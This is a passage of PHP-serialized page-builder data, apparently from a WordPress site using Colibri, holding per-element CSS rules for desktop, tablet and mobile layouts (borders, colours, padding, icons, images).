unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:657;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:658;a:3:{s:7:\"desktop\";s:159:\".style-658 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-658 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:659;a:3:{s:7:\"desktop\";s:87:\"#colibri .style-659-icon {\n fill: rgb(3, 169, 244);\n width: 24px ;\n height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:660;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-660 ol {\n list-style-type: decimal;\n}\n#colibri .style-660 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:661;a:3:{s:7:\"desktop\";s:1439:\"#colibri .style-661-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-661-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-661-caption {\n margin-top: 10px;\n}\n#colibri .style-661-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n#colibri .style-661 {\n text-align: center;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:662;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-662 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:663;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-663 {\n font-style: italic;\n}\n#colibri .style-663 p {\n font-style: italic;\n}\n#colibri .style-663 ol {\n list-style-type: decimal;\n}\n#colibri .style-663 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:668;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-668 {\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:669;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:670;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-670 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:671;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:672;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-672 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:76:\".style-672 > .h-y-container > *:not(:last-child) {\n margin-bottom: 20px;\n}\n\";}i:673;a:3:{s:7:\"desktop\";s:755:\"#colibri .style-673-icon {\n fill: #303e7a;\n width: 50px ;\n height: 50px;\n border-top-width: 2px;\n border-top-color: #303e7a;\n border-top-style: solid;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 2px;\n border-right-color: #303e7a;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #303e7a;\n border-bottom-style: solid;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 2px;\n border-left-color: #303e7a;\n border-left-style: solid;\n padding-top: 10px;\n padding-right: 10px;\n padding-bottom: 10px;\n padding-left: 10px;\n}\n#colibri .style-673-icon:hover {\n fill: #f6f8fa;\n background-color: unset;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:674;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-674 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:46:\"#colibri .style-674 {\n text-align: center;\n}\n\";}i:675;a:3:{s:7:\"desktop\";s:344:\"#colibri .style-675 p,#colibri .style-675 h1,#colibri .style-675 h2,#colibri .style-675 h3,#colibri .style-675 h4,#colibri .style-675 h5,#colibri .style-675 h6 {\n color: rgb(32, 42, 84);\n}\n#colibri .style-675 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:676;a:3:{s:7:\"desktop\";s:249:\"#colibri .style-676 {\n font-size: 16px;\n color: rgb(64, 85, 169);\n}\n#colibri .style-676 p {\n font-size: 16px;\n color: rgb(64, 85, 169);\n}\n#colibri .style-676 ol {\n list-style-type: decimal;\n}\n#colibri .style-676 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:677;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:678;a:3:{s:7:\"desktop\";s:1304:\"#colibri .style-678-icon {\n width: 12px;\n height: 12px;\n margin-right: 10px;\n margin-left: 0px;\n}\n#colibri .style-678 {\n text-align: center;\n background-color: #303e7a;\n background-image: none;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 12px;\n line-height: 1;\n letter-spacing: 1px;\n color: #fff;\n border-top-width: 2px;\n border-top-color: #303e7a;\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #303e7a;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #303e7a;\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #303e7a;\n border-left-style: solid;\n padding-top: 12px;\n padding-right: 24px;\n padding-bottom: 12px;\n padding-left: 24px;\n box-shadow: none;\n}\n#colibri .style-678:hover,#colibri .style-678:focus {\n background-color: rgb(7, 29, 122);\n border-top-color: rgb(7, 29, 122);\n border-right-color: rgb(7, 29, 122);\n border-bottom-color: rgb(7, 29, 122);\n border-left-color: rgb(7, 29, 122);\n}\n#colibri .style-678:active .style-678-icon {\n width: 12px;\n height: 12px;\n margin-right: 10px;\n margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:679;a:3:{s:7:\"desktop\";s:1284:\"#colibri .style-679-icon {\n width: 12px;\n height: 12px;\n margin-right: 10px;\n margin-left: 0px;\n}\n#colibri .style-679 {\n text-align: center;\n background-color: #303e7a;\n background-image: none;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 12px;\n line-height: 1;\n letter-spacing: 1px;\n color: #fff;\n border-top-width: 2px;\n border-top-color: #303e7a;\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #303e7a;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #303e7a;\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #303e7a;\n border-left-style: solid;\n padding-top: 12px;\n padding-right: 24px;\n padding-bottom: 12px;\n padding-left: 24px;\n}\n#colibri .style-679:hover,#colibri .style-679:focus {\n background-color: rgb(7, 29, 122);\n border-top-color: rgb(7, 29, 122);\n border-right-color: rgb(7, 29, 122);\n border-bottom-color: rgb(7, 29, 122);\n border-left-color: rgb(7, 29, 122);\n}\n#colibri .style-679:active .style-679-icon {\n width: 12px;\n height: 12px;\n margin-right: 10px;\n margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:680;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-680 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:681;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:683;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-683 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:684;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-684 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:694;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:695;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-695 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:696;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-696 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:697;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-697 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:698;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-698 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:699;a:3:{s:7:\"desktop\";s:340:\"#colibri .style-699 p,#colibri .style-699 h1,#colibri .style-699 h2,#colibri .style-699 h3,#colibri .style-699 h4,#colibri .style-699 h5,#colibri .style-699 h6 {\n text-align: center;\n}\n#colibri .style-699 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:700;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-700-image {\n opacity: 1;\n}\n#colibri .style-700-caption {\n margin-top: 10px;\n}\n#colibri .style-700-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:701;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:702;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-702 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:703;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-703 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:704;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-704 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:707;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-707-image {\n opacity: 1;\n}\n#colibri .style-707-caption {\n margin-top: 10px;\n}\n#colibri .style-707-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:709;a:3:{s:7:\"desktop\";s:407:\"#colibri .style-709 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n background-color: rgb(7, 146, 226);\n}\n#colibri .style-709 .icon-container {\n fill: #f6f8fa;\n width: 20px ;\n height: 20px;\n}\n#colibri .style-709 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-709 .icon-container:hover {\n fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:710;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-710 ol {\n list-style-type: decimal;\n}\n#colibri .style-710 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:711;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-711 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:740;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-740 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:745;a:3:{s:7:\"desktop\";s:1529:\"#colibri .style-745-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 0px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 0px;\n border-left-width: 0px;\n border-left-style: none;\n box-shadow: none;\n}\n#colibri .style-745-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 0px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 0px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-745-caption {\n margin-top: 10px;\n}\n#colibri .style-745-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 0px;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 0px;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:746;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-746 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:747;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-747 ul {\n list-style-type: disc;\n}\n#colibri .style-747 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:749;a:3:{s:7:\"desktop\";s:629:\"#colibri .style-749-icon {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-749-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n#colibri .style-749 {\n text-align: center;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:750;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-750 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:751;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-751 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:752;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-752-image {\n opacity: 1;\n}\n#colibri .style-752-caption {\n margin-top: 10px;\n}\n#colibri .style-752-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:753;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-753 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:754;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-754 ul {\n list-style-type: disc;\n}\n#colibri .style-754 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:755;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-755-image {\n opacity: 1;\n}\n#colibri .style-755-caption {\n margin-top: 10px;\n}\n#colibri .style-755-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:756;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-756 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:757;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-757 ul {\n list-style-type: disc;\n}\n#colibri .style-757 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:759;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-759-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-759-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:761;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-761-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-761-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:765;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-765 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:766;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-766 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:767;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-767-image {\n opacity: 1;\n}\n#colibri .style-767-caption {\n margin-top: 10px;\n}\n#colibri .style-767-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:768;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-768 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:770;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-770-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n border-top-style: none;\n border-right-width: 1px;\n border-right-color: rgb(125, 79, 79);\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgb(125, 79, 79);\n border-bottom-style: none;\n border-left-width: 1px;\n border-left-color: rgb(125, 79, 79);\n border-left-style: none;\n}\n#colibri .style-770-icon:hover {\n fill: #303e7a;\n background-color: rgba(45, 45, 134, 0);\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:771;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-771 ul {\n list-style-type: disc;\n}\n#colibri .style-771 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:772;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-772 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:773;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-773 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:774;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-774 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:775;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-775 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:776;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-776-image {\n opacity: 1;\n}\n#colibri .style-776-caption {\n margin-top: 10px;\n}\n#colibri .style-776-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:777;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-777 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:778;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-778 ul {\n list-style-type: disc;\n}\n#colibri .style-778 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:780;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-780-icon {\n fill: #9ec9e2;\n width: 20px ;\n height: 20px;\n border-top-width: 1px;\n border-top-color: rgb(125, 79, 79);\n 